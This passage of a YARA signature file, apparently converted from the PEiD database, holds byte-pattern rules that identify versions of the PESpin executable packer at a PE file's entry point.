8D B4 0D DC 2C 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V11_cyberbobnbsp_nbsp_SignByfly_20080311: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 ?? 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 00 EB FB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 ?? ?? ?? ?? ?? ?? F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 ?? EB FB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v13beta_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 ?? 4E 40 00 8B 42 3C 03 C2 89 85 ?? 4E 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D ?? 4E 40 00 53 8F 85 ?? 4C 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD ?? 4F 40 00 8D 5B 04 8B 1B 89 9D ?? 4F 40 00 E8 00 00 00 00 58 01 68 05 68 BC 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC FF 25 10 BB ?? 00 00 00 B9 84 12 00 00 8D BD ?? 4F 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESPin_v13_Cyberbob_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 0D 4F 40 00 8B 42 3C 03 C2 89 85 17 4F 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D 2B 4F 40 00 53 8F 85 21 4D 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD D0 4F 40 00 8D 5B 04 8B 1B 89 9D D5 4F 40 00 E8 00 00 00 00 58 01 68 05 68 F7 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v1304_Cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v10_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 D2 42 40 00 8B 42 3C 03 C2 89 85 DC 42 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D F0 42 40 00 53 8F 85 94 41 40 00 BB ?? 00 00 00 B9 8C 0B 00 00 8D BD 80 43 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 40 4E 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 FD 68 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V11_cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_10_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESPin_13_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V0b_cyberbobnbsp_nbsp_SignByfly_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 72 C8 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 26 E8 01 00 00 00 ?? 5A 33 C9 ?? ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B ?? ?? ?? ?? ?? ?? 8B 59 24 03 DA 8B 1B ?? ?? ?? ?? ?? ?? 53 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 6A 0C 5B 6A 17 59 30 0C 03 02 CB 4B 75 F8 40 8D 9D 41 8F 4E 00 50 53 81 2C 24 01 78 0E 00 ?? ?? ?? ?? ?? ?? C3 92 EB 15 68 ?? ?? ?? ?? ?? B9 ?? 08 00 00 ?? ?? ?? ?? ?? ?? 4F 30 1C 39 FE CB E2 F9 68 1D 01 00 00 59 ?? ?? ?? ?? ?? ?? C0 0C 39 02 E2 FA 68 ?? ?? ?? ?? 50 01 6C 24 04 E8 BD 09 00 00 33 C0 0F 84 C0 08 00 00 ?? ?? ?? ?? ?? ?? 50 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF E0 C3 8D 64 24 04 E8 53 0A 00 00 D7 58 5B 51 C3 F7 F3 32 DA ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 81 2C 24 A3 00 00 00 58 ?? ?? ?? ?? ?? ?? 53 FF E0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v07_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 88 39 40 00 8B 42 3C 03 C2 89 85 92 39 40 00 EB 01 DB 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D A6 39 40 00 53 8F 85 4A 38 40 00 BB ?? 00 00 00 B9 EC 0A 00 00 8D BD 36 3A 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 56 44 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 B3 5F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D 99 39 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_v03_Eng_cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESPin_13_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v07_Cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 88 39 40 00 8B 42 3C 03 C2 89 85 92 39 40 00 EB 01 DB 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D A6 39 40 00 53 8F 85 4A 38 40 00 BB ?? 00 00 00 B9 EC 0A 00 00 8D BD 36 3A 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 56 44 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 B3 5F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D 99 39 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_07_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_03_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_V11_cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v10_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 D2 42 40 00 8B 42 3C 03 C2 89 85 DC 42 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D F0 42 40 00 53 8F 85 94 41 40 00 BB ?? 00 00 00 B9 8C 0B 00 00 8D BD 80 43 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 40 4E 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 FD 68 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V13betaX_cyberbob_20080311: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 ?? EB FB ?? ?? ?? ?? ?? ?? ?? 8B 42 3C 03 C2 ?? ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v11_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 C3 4B 40 00 8B 42 3C 03 C2 89 85 CD 4B 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D E1 4B 40 00 53 8F 85 D7 49 40 00 BB ?? 00 00 00 B9 FE 11 00 00 8D BD 71 4C 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C C1 2C 24 06 F7 14 24 83 24 24 01 50 52 B8 83 B2 DC 12 05 44 4D 23 ED F7 64 24 08 8D 84 28 BD 2D 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC FF EA EB 01 C8 E8 01 00 00 00 68 58 FE 48 1F 0F 84 94 02 00 00 75 01 9A 81 70 03 E8 98 68 EA 83 C0 21 8? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v03_Eng_cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 0D 4F 40 00 8B 42 3C 03 C2 89 85 17 4F 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D 2B 4F 40 00 53 8F 85 21 4D 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD D0 4F 40 00 8D 5B 04 8B 1B 89 9D D5 4F 40 00 E8 00 00 00 00 58 01 68 05 68 F7 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v03_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v13beta_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 ?? 4E 40 00 8B 42 3C 03 C2 89 85 ?? 4E 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D ?? 4E 40 00 53 8F 85 ?? 4C 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD ?? 4F 40 00 8D 5B 04 8B 1B 89 9D ?? 4F 40 00 E8 00 00 00 00 58 01 68 05 68 BC 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC FF 25 10 BB ?? 00 00 00 B9 84 12 00 00 8D BD ?? 4F 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESPin_v13_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V10_cyberbobnbsp_nbsp_SignByfly_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 ?? ?? ?? ?? ?? ?? ?? C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 ?? EB FB FF 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 ?? ?? ?? ?? 83 04 24 0C C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v13beta2_Cyberbob_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 ?? 4E 40 00 8B 42 3C 03 C2 89 85 ?? 4E 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D ?? 4E 40 00 53 8F 85 ?? 4C 40 00 EB 07 FA EB 01 FF EB 04 E3 